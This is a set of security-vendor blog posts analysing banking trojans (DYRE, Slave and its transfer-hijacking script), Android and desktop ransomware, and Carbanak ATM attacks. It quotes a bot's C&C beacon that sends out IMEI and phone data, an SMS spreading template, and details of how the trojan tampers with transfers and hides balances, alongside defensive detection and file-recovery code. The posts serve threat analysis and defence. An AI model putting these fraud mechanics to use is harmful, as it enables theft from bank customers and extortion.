
DYRE trojan targets Spain

Although it is only a few months old, the DYRE Trojan (aka Dyreza) is currently the busiest banking malware. Since early this year a fairly proactive gang has been adding aggressive characteristics to the binary, working to increase its infrastructure and monetization capacity. Progress has been noticed on two different fronts:

  • Expanding the botnet's geographical area: the binary is spread through spam campaigns with malicious attachments. At first these were limited to English-speaking countries, but they have since expanded their reach.
  • Incorporation of new banks: DYRE is configured via the usual file that lists the banks where the Trojan must act. As the botnet's area of influence has expanded, the list of entities has also grown, as shown in the following chart.

Given this growing dynamic, it was just a matter of time before Spain, so far outside the campaign, entered the list. The latest version of the configuration file was distributed a few days ago; in it, at least five Spanish banks, and others in Colombia, Chile and Venezuela, have been included for the first time.

The countries currently targeted by the criminals are reflected in the following map:

While its behavior is similar to the well-known Zeus, DYRE presents some interesting approaches to the fraud process that deserve to be analyzed in an upcoming post :)

S21sec eCrime

ATS: Slave's best friend

A few days ago we commented in this blog on the discovery of the Slave Trojan, a new malware distinguished by its webinjects in JSON format. In this post we will dissect the automatic transfer system (ATS) that works together with Slave, which is configured to target certain banks.
The ATS injected by Slave is simple in its operation but very effective at the same time; in our research we were able to analyze the script code executed in the victim's browser. It is designed in a modular way, allowing quick and easy adaptation to different online banking "sites". At the time of analysis the ATS targeted three banks, with different injects for each type of access (companies or individuals). New entities were also found which, although not yet present in the Slave config, seemed to be ready for activation in the near future.

To identify the online banking page where the user is located, the script uses different techniques such as inspecting the current URL or searching for specific items in the website's DOM.
Depending on the page where the user is located, the script performs different actions. Pages with a code larger than 100 correspond to the login forms, of which, depending on the bank, there may be 1 or 2 different matches. In these pages the script collects the user's credentials and stores them in the browser's sessionStorage. If the entity asks for only some digits of a second password, the script is able to recognize which digits are requested and send the mask of that password. However, the ATS does not need to steal credentials for its operation, and the only action performed with them is to send them to the C&C, possibly for manual review. This behavior suggests that its priority is not capturing credentials but modifying transfers in real time, as discussed below.

If the user's credentials are captured correctly, the script starts executing the following actions on the rest of the website:

  • Action 1 (landing page): it simply sends the username and password used to log in. Depending on the bank, this action can be ignored.
  • Action 2 (accounts info): it looks for information on the user's accounts, extracts the data and sends it to the C&C in the following format:
               Owner Name * Account Number * Balance * - * |
  • Action 3 (new transfer): it is responsible for altering a legitimate transfer so that the money is redirected to a money mule instead of the original recipient. Before doing so, various checks are performed, including whether the account has enough funds and whether a fraudulent transfer has already been made. If the victim passes these checks, a money mule is requested from the C&C.

The response to this request includes the personal details of the new recipient of the transaction and the amount to send. With this information the script tampers with the transfer, showing the user the data they expect to see (the transfer they believe they performed) while sending the illegitimate data to the bank.
In this way it is the user who completes the verification steps, whether by entering coordinate card values, the PIN sent to the mobile phone or any other TAN factor.

Additionally, once the illegitimate transfer has been made, the fixBalance() function is executed on every page where the account balance appears. This function changes the displayed balance value to hide the theft. This functionality is even persistent across sessions, so while the user remains infected the fraudulent transfer and the real balance will be completely undetectable on the bank's website.

Regarding the communication between the script and the C&C, although it was not possible to replicate this process, a preliminary analysis led to the following conclusions:
  • To contact the C&C the script uses JSONP; depending on the injection it may load the jQuery library to make the requests.
  • In all of them a "key" field, hardcoded in the binary itself and necessary for the communication, is added.
  • Beyond this check and the SSL layer, the script-C&C communications do not appear to include any other kind of encryption or obfuscation.
Finally, these are the MD5 hashes identifying the analyzed samples:
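As an added example (not code from the Slave/ATS script nor from S21sec), the following helper shows how an analyst or a bank's front-end team could triage script sources of the kind described above: an off-origin JSONP callback carrying a hardcoded "key" field, with the account records in the "Owner Name * Account Number * Balance * - * |" format. The origins, the `data` parameter name and the sample records are constructed assumptions.

```javascript
// Added example, not the ATS's own code. The bank origin, the "data" query
// parameter and all sample URLs/records below are constructed assumptions.
const BANK_ORIGINS = new Set(["https://online.example-bank.test"]);

// Parse records in the "Owner Name * Account Number * Balance * - * |" format;
// several records are concatenated, each terminated by "|".
function parseAccountRecords(payload) {
  return payload
    .split("|")
    .map((r) => r.trim())
    .filter((r) => r.length > 0)
    .map((r) => {
      const f = r.split("*").map((x) => x.trim());
      return { owner: f[0], account: f[1], balance: Number(f[2].replace(",", ".")) };
    });
}

// Classify one script src: does it leave the bank's origin, does it look like a
// JSONP callback, and does it carry the hardcoded "key" field?
function classifyScriptSrc(src, allowedOrigins) {
  const u = new URL(src);
  const p = u.searchParams;
  return {
    offOrigin: !allowedOrigins.has(u.origin),
    jsonp: p.has("callback") || p.has("jsoncallback"),
    hasKey: p.has("key"),
    key: p.get("key"),
    records: p.has("data") ? parseAccountRecords(p.get("data")) : [],
  };
}

// Only the combination off-origin + JSONP + "key" is reported, so a legitimate
// third-party JSONP library on a CDN is not flagged by itself.
function findSuspiciousScripts(srcs, allowedOrigins) {
  return srcs
    .map((s) => ({ src: s, ...classifyScriptSrc(s, allowedOrigins) }))
    .filter((c) => c.offOrigin && c.jsonp && c.hasKey);
}

// Constructed sample: one bank script, one benign CDN JSONP call, one exfil call.
const SAMPLE_SCRIPT_SRCS = [
  "https://online.example-bank.test/static/jquery.min.js",
  "https://cdn.example.test/widget.js?callback=init",
  "https://c2.example.test/gate.php?callback=jQuery123&key=K3Y&data=" +
    encodeURIComponent(
      "John Doe * ES0011112222333344445555 * 1500.00 * - * |" +
      "Jane Roe * ES0099998888777766665555 * 230.50 * - * |"),
];
```

In a real deployment the same signal is cheaper to get from a Content Security Policy report than from scanning the DOM, since injected script tags violate a strict `script-src` allow-list.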


New Ransomware in Mobile environment

The new malware trend that has caused so many problems in the last year is widely known: the infamous ransomware (Cryptowall, Cryptolocker and their derivatives).

Although we have seen samples in the mobile environment (Koler), it was not common to find traditional spam carrying such malicious applications, until now.

A generic spam e-mail we received a few days ago included a suspicious attachment named “Check Updates.apk”, probably pretending to be a Flash Player update.

At first glance, just by reviewing the embedded images and HTML documents, the application is far from being a software update.

These documents, which will be presented to the victim as part of the scam, follow the usual scheme; in this case the scam is as follows: the FBI has detected, through the PRISM platform, that the user has browsed forbidden web pages and must pay a fine.

The app installation is pretty simple, and after opening it a video player menu (obviously fraudulent) is displayed.

After a few seconds the disclaimer window pops up, pinned to the screen, preventing the end user from closing it or using other apps.

This message, unlike Koler's, always remains the same regardless of where the end user is located. Here are some screenshots taken during this step:

Once the mobile device is locked and the ransom requested, the next step is the purchase and loading ($500) of a PayPal MyCash card, in order to provide the card number to the botmaster through the app panel, as seen in the image above.

From a technical point of view the app is pretty simple. It requires a high number of privileges and uses the platform features like a normal app (it does not use exploits or require root privileges). These are the main features:

  • The ransom disclaimer window is generated as a system alert, shown over other applications or windows.
  • The crypto system used is AES, via the standard library. The key and salt used are always the same (PBKDF2WithHmacSHA1):
  • Although the cipher and decipher code is complete, there is no evidence from the tests performed in our Labs that the app actually ciphers the external storage (target: /sdcard/Android/).
  • The app uses a third-party library named Volley for connection management.
  • To frighten the end user, some personal information is shown, such as browser bookmarks, the end user's photo (taken with the front camera) and geolocation based on the device IP.
  • The main functionalities are:
  1. SMS and contacts delivery to the malicious server
  2. Incoming SMS capture
  3. SMS delivery through the device
  4. Cipher/decipher external SD storage
  5. Device lock and unlock
  • SMS spread: the malicious server sends an SMS template to the device in order to send an SMS with the APK URL to the whole contact list (this was also observed in recent Koler samples).

Control Panel

The control panel URL is hardcoded in the bot code. Once the URL is resolved, it is periodically queried to get new commands (using HTTP requests and JSON answers):

GET /pha?android_version=4.1.2&id=xxxxxxxxxx&phone_number=xxxxxxxxx&client_version=1.03&imei=xxxxxxxxxxxxxxxx&name=sdk

During bot registration an SMS template and geolocation data are also received, as explained before:

{"sms_template": "OMG!!! Guess who's on a video here, you will not believe it!!!  hxxp://"}

{"city": "Madrid", "ip": "", "lon": yy.yyy, "lat": zz.zzz, "country_code": "ES", "country_name": "Spain"}

The server also implements a backdoor access in order to control and query the bot.
This server hosts an “app-download” website (similar to a third-party market) which also serves the fake application.
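As an added example (not the bot's code nor S21sec's tooling), the following Node.js snippet flags the registration beacon described above in proxy logs and parses the JSON command replies. The log line format, the host names, the client IPs and the defanged spread URL are constructed assumptions.

```javascript
// Added example, not the bot's own code. Log format, hosts and values below
// are constructed; only the /pha path, its parameter names and the JSON keys
// come from the observed traffic described in the post.
const BEACON_PATH = "/pha";
const BEACON_PARAMS = ["android_version", "id", "phone_number",
                       "client_version", "imei", "name"];

// Constructed proxy log lines: "<timestamp> <client-ip> <method> <url> <status>".
const SAMPLE_PROXY_LOG = [
  "2015-03-01T10:00:01Z 10.0.0.5 GET http://panel.example.test/pha?android_version=4.1.2&id=1234567890&phone_number=600000000&client_version=1.03&imei=0000000000000000&name=sdk 200",
  "2015-03-01T10:00:02Z 10.0.0.6 GET http://www.example.test/index.html 200",
  "2015-03-01T10:00:03Z 10.0.0.7 GET http://other.example.test/pha?foo=bar 404",
];

// A URL is a beacon when its path is /pha and every expected parameter is present;
// requiring the full parameter set keeps unrelated "/pha" paths from matching.
function isBeacon(url) {
  let u;
  try { u = new URL(url); } catch (e) { return false; }
  if (u.pathname !== BEACON_PATH) return false;
  return BEACON_PARAMS.every((k) => u.searchParams.has(k));
}

// One finding per beacon line, with the fields a responder wants to pivot on.
function findBeacons(lines) {
  const out = [];
  for (const line of lines) {
    const parts = line.split(" ");
    if (parts.length < 5 || !isBeacon(parts[3])) continue;
    const q = new URL(parts[3]).searchParams;
    out.push({ ts: parts[0], client: parts[1], imei: q.get("imei"),
               clientVersion: q.get("client_version") });
  }
  return out;
}

// Parse a command reply: the SMS template carries the spread URL (shown
// defanged as "hxxp://" in the post), the geo reply carries location fields.
function parseCommand(body) {
  const j = JSON.parse(body);
  if (typeof j.sms_template === "string") {
    const m = j.sms_template.match(/h(?:xx|tt)ps?:\/\/\S*/i);
    return { kind: "sms_spread", template: j.sms_template, url: m ? m[0] : null };
  }
  if ("country_code" in j) {
    return { kind: "geo", city: j.city, country: j.country_code };
  }
  return { kind: "unknown" };
}
```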

Conclusion and Countermeasures

The ransomware “boom” is finding new distribution channels. Despite being pretty simple apps, they achieve their objective of extorting the end user. The methods used are strongly oriented to social engineering, but new functionalities are constantly being added (SMS capture, spreading).

As a countermeasure, it is recommended to keep “install from untrusted sources” disabled and to filter out emails with .apk attachments.

If the malicious application is already installed, the device can be cleaned with “adb uninstall” (it requires USB debugging to be active) or by rebooting the system in safe mode in order to delete it afterwards.

New banking trojan 'Slave' hitting Polish Banks

We have spotted a new banking trojan in the wild that uses JSON-formatted webinjects. After so many Zeus-like webinjects around, this was kind of refreshing. Currently this banker only has targets in Poland. We are analyzing the injects, as they are capable of using ATS.

The malware has a time check which prevents it from running after 1 April 2015. Don't be fooled: the botmaster would probably issue an update command before that could happen, but this can render useless the already "captured" samples circulating on the internet between researchers.

There are indications that the author used Chromium source code to build the malware, hence we dubbed it "Slave":

One of the original filenames was Faktura V_388_02_20_2015.doc.scr, which pretty much sounds like it was distributed via spam.

Some hashes:

If possible, we will show how the ATS works for this injection in an update.

For further info, please contact us: blog [at]

S21sec Ecrime


In October 2014, an investigation by the international police organization Interpol alerted of a new type of banking malware, called Tyupkin, that allowed criminals to gain full control of ATMs, enabling them to steal huge amounts of cash without having to use a credit or debit card (see our blog post).

Far from being an isolated case, recent events show a boost in ATM-targeted malware attacks, with a variety of attack vectors all sharing a common goal: stealing huge amounts of cash directly from the bank, leaving its customers aside.

The hottest topic to date is the Carbanak APT (also known as Anunak), a sophisticated cyberattack affecting financial institutions in more than 30 countries, with cumulative losses of up to 1 billion USD.

The attack vector consisted of compromising the victim's network by means of spear-phishing emails that downloaded the malicious code, which was later propagated to critical systems.

Having infected key users, the attackers spied on them to gain detailed knowledge of internal tools and procedures, enabling them to mimic those users' activities and perform fraudulent actions while remaining unnoticed by the bank's fraud detection systems.

Although the criminals pursued multiple routes, one of the relevant targets was control of the Automated Teller Machine (ATM) network.

ATM Network Control with Carbanak

Once the Carbanak APT had successfully compromised the victim's network, the attackers managed to gain access to the ATM management infrastructure and infect those systems with their own malicious software.

Although there might be more attack techniques not yet discovered, evidence of the following ATM-targeted malware attacks has been found:
  1. Change of denomination of withdrawn banknotes
    The ATM was manipulated to modify the banknote denominations, allowing mules to withdraw more money than was actually registered in the transaction.
    The attackers uploaded malicious scripts and modified the ATM operating system registry to change the denominations of the issued banknotes. As a result, a transaction for 10 notes with a denomination of 100 roubles gave the attackers 10 notes with a denomination of 5,000 roubles.

  2. Remote withdrawal of cash from the dispenser
    The ATM network was used to dispense cash from certain ATMs at certain times, when money mules were ready to collect it.

    The attackers used a modified debug program that accepts commands to issue money from the dispenser. The original program only works when the ATM door is open, but the tampered one ignored this check.

    The criminals were able to control computers that had access to the internal ATM network, using them to remotely issue cash withdrawal commands.

Based on this evidence we can say that the Carbanak campaign is a clear indicator of a new era in cybercrime, in which criminals use APT techniques directly against the financial industry instead of through its customers. APTs are no longer only for stealing information.

ATM Targeted Malware vs Lack of Security Measures

Malware attacks are one of the biggest concerns in ATM fraud since they are far less risky and much more profitable than traditional skimming or physical attacks.

The criminals are extremely agile and innovative in producing new types of malware to launch direct APT-like attacks against banks, but they are also helped by the very poor security of ATMs, which still run old Microsoft systems, and by weaknesses in the ATM infrastructure.

Every ATM is exposed to malware attacks, and therefore applying strong security countermeasures is a must. An integrated security solution based on Application Whitelisting, Full Disk Encryption, HW Protection and File Protection provides the most advanced and most effective countermeasure capability to stop this new generation of attacks.

In the case of the above-mentioned attacks, Application Whitelisting would have prevented the script that changed the banknote denominations from running, while File Protection would have prevented the attackers from replacing the ATM debug program binary.

S21sec Approach to ATM Security

S21sec has extensive expertise in the development of solutions adapted to the needs of the banking industry. Its product Lookwise Device Manager helps to protect ATM networks from logical attacks by restricting their usage to authorized hardware and processes only, monitoring ATM activity, and allowing remote actions to be executed.

S21sec also provides specialized and advanced security services for financial organizations.
We are members of ATMIA and ATEFI industry associations.


Juan Ramón Aramendía 
Lookwise Product Marketing Manager

Bulk spam campaign for Dalexis+CTB-Locker


In the last few days a bulk spam campaign has been detected distributing the Dalexis malware downloader. Below these lines you will find a screenshot taken from one of the spam mails.

The files attached to the emails are compressed files with the extensions .zip or .cab. Within them there is a .scr file which, once executed, will display one of the following documents:

  • Document 1

  • Document 2

  • Document 3

This downloader is linked to the CTB-Locker ransomware. This crypto-malware ciphers files based on their extension, including: pdf, xls, ppt, txt, py, wb2, jpg, odb, dbf, md, js, pl. It is able to cipher files located both on local and mapped drives.

Once file ciphering is completed the following ransom message is shown:

The message will be localised depending on the victim's location. Available languages are: French, English, Italian, German and Dutch. The cybercriminals include additional information to guide the victim through the steps needed to pay the ransom.

The ransomware download is performed through a TOR request using a gateway, attempting to evade AV tools and proxies. Furthermore, the downloaded file is also ciphered and is deciphered by the downloader in order to run it.

Until now we have seen the following URLs within Dalexis samples:


File recovery

CTB-Locker uses a custom elliptic-curve-based ciphering algorithm which guarantees that files will be irrecoverable without the proper key.


As usual, prevention is the best countermeasure. Avoid opening unsolicited e-mail attachments and implement a proper privilege policy for network shares.

In addition, you can mitigate the problem by blocking the Dalexis URLs, thus avoiding the CTB-Locker download. S21sec's Automatic Malware Analysis Platform analyzes tens of thousands of samples daily. Information gathered from the analyzed samples is fed into the Lookwise Threat Intelligence solution, which companies can use for threat detection in their internal networks.

TorrentLocker Campaign affecting Spain and Italy

Recently S21sec detected a very active ransomware campaign focused on Spain and Italy. The malware of choice this time has been TorrentLocker, and the means to trick the user into installing the malware is a series of spam mails with a link to the malware.

Ransomware is a kind of threat that either blocks the desktop or encrypts the information contained in the infected device. In both cases the criminals demand a payment to restore the system; usually the victim is required to purchase Bitcoins, Ukash vouchers or some other non-traceable currency for the payout.

During the last two years we have seen several threats sharing a similar approach on desktop computers, but they also target mobile devices. Some examples are: CryptoLocker, Reveton, Netra, CryptoWall, Decode@india, TorLocker, Urausy…


TorrentLocker affects Microsoft Windows systems and is reminiscent, although only in appearance, of the infamous CryptoLocker. When the implementations are compared, substantial differences arise.

The main resemblance comes from the appropriation of the CryptoLocker name in the ransom note. This may be done to boost the intimidation effect of the blackmail with the name of a better-known threat; it could also be an attempt to hide several weaknesses in the earlier versions.


This ransomware encrypts all files with any of the following extensions stored on every mapped drive. This means that TorrentLocker will not encrypt network shared folders unless they are mounted as a local drive; the same applies to recovery partitions.

After a successful infection TorrentLocker tries to establish a TLS session with its C&C server in order to obtain the encryption key; unlike CryptoLocker, which employed a DGA, the C&C address is hardcoded in the binary. If the communication with the C&C panel cannot be performed, no encryption takes place at all.

Currently two versions of the malware have been reported; the main change between them lies in the encryption algorithm used.

Early versions 

The first news of the original TorrentLocker version dates back to August 2014, when another spam campaign impersonating the national postal service hit Australia.

This early version used a rudimentary encryption routine consisting of applying a static XOR mask to the first 2 MB of the file (files smaller than 2 MB were fully encrypted). So if the victim had an unencrypted copy of a file bigger than 2 MB, it was possible to retrieve the XOR key and restore the files using the following tool.
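As an added example (not the recovery tool referenced above nor S21sec's code), the following Node.js snippet carries out the known-plaintext recovery the paragraph describes: it derives the static XOR mask from an encrypted file and its unencrypted copy, checks that bytes beyond the masked prefix are untouched, and restores another file with the recovered mask. The sample file contents and the deterministic demo mask are constructed; the 2 MB prefix length is the one described, and the test uses a smaller one.

```javascript
// Added example, not the tool from the original post. Sample data is constructed.
const PREFIX_LEN = 2 * 1024 * 1024; // only the first 2 MB of each file is masked

// XOR the first min(file, mask, prefixLen) bytes of a copy of buf with mask.
function xorPrefix(buf, mask, prefixLen) {
  const out = Buffer.from(buf); // copy, never alter the original evidence
  const n = Math.min(out.length, mask.length, prefixLen);
  for (let i = 0; i < n; i++) out[i] ^= mask[i];
  return out;
}

// Recover the mask from an encrypted file and its unencrypted copy. A copy at
// least prefixLen bytes long yields the whole mask; a shorter one yields a
// partial mask that can only restore files no longer than the copy.
function recoverMask(plain, encrypted, prefixLen = PREFIX_LEN) {
  if (plain.length !== encrypted.length) throw new Error("size mismatch");
  const n = Math.min(plain.length, prefixLen);
  const mask = Buffer.alloc(n);
  for (let i = 0; i < n; i++) mask[i] = plain[i] ^ encrypted[i];
  // Bytes past the prefix must be identical, otherwise this is not the
  // prefix-only XOR variant and the recovered mask is meaningless.
  if (plain.length > n && !plain.subarray(n).equals(encrypted.subarray(n))) {
    throw new Error("tail differs: not a prefix-only XOR scheme");
  }
  return mask;
}

// Restore one encrypted file; refuse when the mask does not cover its prefix.
function restoreFile(encrypted, mask, prefixLen = PREFIX_LEN) {
  if (Math.min(encrypted.length, prefixLen) > mask.length) {
    throw new Error("mask too short for this file");
  }
  return xorPrefix(encrypted, mask, prefixLen);
}

// Constructed demo: mask two files with one static mask, recover it from
// file A and its backup, then restore file B. Returns true on success.
function demo(prefixLen = 64) {
  const mask = Buffer.from(
    Array.from({ length: prefixLen }, (_, i) => (i * 73 + 41) & 0xff));
  const fileA = Buffer.from("A".repeat(100)); // longer than the prefix
  const fileB = Buffer.from("B".repeat(40) + "tail"); // shorter: fully masked
  const encA = xorPrefix(fileA, mask, prefixLen);
  const encB = xorPrefix(fileB, mask, prefixLen);
  const recovered = recoverMask(fileA, encA, prefixLen);
  return restoreFile(encB, recovered, prefixLen).equals(fileB);
}
```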

In our opinion, it may be because of this weak algorithm that the criminals chose to disguise themselves as CryptoLocker, given the dreadful reputation of that trojan.

AES TorrentLocker

It was in early December 2014 that a new variant of the malware broke out. The new strain uses AES (Advanced Encryption Standard); this change makes it more difficult to retrieve the files.

It is still possible to retrieve the files if a file carving tool is used right after the infection, because TorrentLocker does not delete the files securely after encryption.

For a more in-depth analysis you should consider reading the original work on the malware done by iSIGHT Partners.


The initial reports about the spam campaign we are analyzing in this post reached us during the first two days of December. It was active until December 5th at 20:09 (GMT+1), when the C&C servers went dark and stopped showing any activity.

Spam mails

Throughout the campaign several mail templates were employed in order to trick users into downloading the attached .zip files. We have identified that at least three different templates were used.

  • Mail 1
  • Mail 2
  • Mail 3

The links served .zip files that, once unzipped, showed the following names:

  • Informe.Pdf_____________________________________________________________.exe
  • Perfil.Pdf _____________________________________________________________.exe
  • Processing.Pdf_____________________________________________________________.exe
  • Mensaje.pdf_____________________________________________________________.exe

Again, a low-tech but effective approach is taken in order to hide the file extension.


It is easy to spot that over 80% of the affected users are in Spain and Italy, with little impact in other countries. As a side and funny fact, we found one affected computer in the Vatican State.

Additionally we have detected TorrentLocker campaigns targeting Turkey and Australia after the conclusion of the Spanish/Italian operation.


Due to its easy monetization and the relatively simple support infrastructure needed, we are seeing a rise in the number of infections caused by some variety of ransomware.

In these cases prevention is the best defense for the user because, as we have seen, recovering the files can be extremely difficult once they have been ciphered. In corporate networks it is important to control the access and privilege level of shared resources, such as network-accessible drives, in order to confine the damage to the infected device only.


© Copyright S21sec 2013 - All rights reserved